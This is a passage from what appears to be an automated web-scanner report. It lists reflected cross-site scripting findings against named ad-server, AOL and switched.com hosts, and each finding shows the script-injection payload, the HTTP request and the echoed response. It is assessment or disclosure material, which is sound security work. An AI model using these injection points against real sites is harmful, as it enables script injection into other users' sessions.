Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/768404049/x23803d1"><script>alert(1)</script>26ba130f8ba/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.82. http://dm.de.mookie1.com/2/B3DM/2010DM/11485203807@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11485203807@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c2a"><script>alert(1)</script>771ead1711a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM28c2a"><script>alert(1)</script>771ead1711a/2010DM/11485203807@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM28c2a"><script>alert(1)</script>771ead1711a/2010DM/1478825337/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.83. http://dm.de.mookie1.com/2/B3DM/2010DM/11485203807@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11485203807@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0abe"><script>alert(1)</script>8b2842306a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMa0abe"><script>alert(1)</script>8b2842306a2/11485203807@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMa0abe"><script>alert(1)</script>8b2842306a2/719493014/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.84. http://dm.de.mookie1.com/2/B3DM/2010DM/11485203807@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11485203807@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61f91"><script>alert(1)</script>71d3e73a096 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11485203807@x2361f91"><script>alert(1)</script>71d3e73a096?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1427428079/x2361f91"><script>alert(1)</script>71d3e73a096/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.85. http://dm.de.mookie1.com/2/B3DM/2010DM/1628576703@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1628576703@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52a9"><script>alert(1)</script>3157c2acd71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMc52a9"><script>alert(1)</script>3157c2acd71/2010DM/1628576703@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMc52a9"><script>alert(1)</script>3157c2acd71/2010DM/1693177449/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.86. http://dm.de.mookie1.com/2/B3DM/2010DM/1628576703@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1628576703@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f603e"><script>alert(1)</script>27d19133c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMf603e"><script>alert(1)</script>27d19133c5/1628576703@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMf603e"><script>alert(1)</script>27d19133c5/785782942/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

1.87. http://dm.de.mookie1.com/2/B3DM/2010DM/1628576703@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1628576703@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5cc"><script>alert(1)</script>f02ef969490 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1628576703@x239a5cc"><script>alert(1)</script>f02ef969490?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1871454065/x239a5cc"><script>alert(1)</script>f02ef969490/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.88. http://dm.de.mookie1.com/2/B3DM/2010DM/1671449763@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1671449763@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62000"><script>alert(1)</script>f73671ebfb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM62000"><script>alert(1)</script>f73671ebfb0/2010DM/1671449763@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM62000"><script>alert(1)</script>f73671ebfb0/2010DM/1529177560/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.89. http://dm.de.mookie1.com/2/B3DM/2010DM/1671449763@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1671449763@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bedb1"><script>alert(1)</script>bd5553a3aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMbedb1"><script>alert(1)</script>bd5553a3aa/1671449763@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMbedb1"><script>alert(1)</script>bd5553a3aa/362689577/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

1.90. http://dm.de.mookie1.com/2/B3DM/2010DM/1671449763@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1671449763@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72819"><script>alert(1)</script>6bd426211c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1671449763@x2372819"><script>alert(1)</script>6bd426211c5?USNetwork/RS_SDYN_2011Q1_AOL_DEF_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1270783460/x2372819"><script>alert(1)</script>6bd426211c5/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.91. http://downloads.channel.aol.com/toolbar [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://downloads.channel.aol.com
Path:   /toolbar

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 794ee"-alert(1)-"6f9e676b6eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /toolbar794ee"-alert(1)-"6f9e676b6eb HTTP/1.1
Host: downloads.channel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.789990733.3152676352; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:36 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 8537
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm30 -->
<html xmlns="http://www.w3.org/1999/xhtml" x
...[SNIP]...
<!--
s_265.mmxgo=false;
s_265.pageName="Page Not Found";
s_265.channel="us.downloads";
s_265.trackExternalLinks="true";
s_265.prop1="toolbar794ee"-alert(1)-"6f9e676b6eb";
s_265.pfxID="brw";
s_265.disablepihost=false;
s_265.prop12="http://downloads.channel.aol.com/toolbar794ee\"-alert(1)-\"6f9e676b6eb";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265
...[SNIP]...

1.92. http://downloadsquad.switched.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://downloadsquad.switched.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62c89"><script>alert(1)</script>de3d7e413b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?62c89"><script>alert(1)</script>de3d7e413b9=1 HTTP/1.1
Host: downloadsquad.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:21:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 104528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://downloadsquad.switched.com/?62c89"><script>alert(1)</script>de3d7e413b9=1"/>
...[SNIP]...

1.93. http://downloadsquad.switched.com/2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://downloadsquad.switched.com
Path:   /2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60107"><script>alert(1)</script>f339a23027b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/?60107"><script>alert(1)</script>f339a23027b=1 HTTP/1.1
Host: downloadsquad.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:21:12 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:21:11 GMT; path=/
Keep-Alive: timeout=5, max=999985
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 67560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://downloadsquad.switched.com/2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/?60107"><script>alert(1)</script>f339a23027b=1"/>
...[SNIP]...

1.94. http://downloadsquad.switched.com/2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://downloadsquad.switched.com
Path:   /2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ebd1"><script>alert(1)</script>f18dae81e83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/?9ebd1"><script>alert(1)</script>f18dae81e83=1 HTTP/1.1
Host: downloadsquad.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:21:23 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:21:22 GMT; path=/
Keep-Alive: timeout=5, max=999991
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 69668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://downloadsquad.switched.com/2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/?9ebd1"><script>alert(1)</script>f18dae81e83=1"/>
...[SNIP]...

1.95. http://downloadsquad.switched.com/2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://downloadsquad.switched.com
Path:   /2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 271c2"><script>alert(1)</script>4f9f1e70ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/?271c2"><script>alert(1)</script>4f9f1e70ef=1 HTTP/1.1
Host: downloadsquad.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:21:23 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:21:22 GMT; path=/
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
